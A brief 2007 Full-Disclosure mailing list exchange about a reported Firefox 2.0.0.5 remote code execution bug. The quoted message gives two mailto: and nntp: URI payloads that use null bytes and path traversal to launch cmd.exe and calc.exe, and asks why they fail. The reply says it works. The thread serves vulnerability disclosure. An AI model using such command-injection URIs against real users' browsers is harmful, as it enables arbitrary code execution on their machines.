works like a charm :) ? On 7/25/07, Mesut EREN <[EMAIL PROTECTED]> wrote: > > > > Hi all, > > FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5. But > don't work is code. > > Example code is > > mailto:%00%00../../../../../../windows/system32/cmd".exe > ../../../../../../../../windows/system32/calc.exe " - " > blah.bat > > nntp:%00%00../../../../../../windows/system32/cmd".exe > ../../../../../../../../windows/system32/calc.exe " - " > blah.bat > > Where i missing? > > > > Mesut EREN > BAŞAK ÇATI & CEPHE SİSTEMLERİ > Bilgi İşlem Sorumlusu > > MCSA:S,MCSE:S,CEH,CCNA > > [EMAIL PROTECTED] > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
-- pdp (architect) | petko d. petkov http://www.gnucitizen.org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
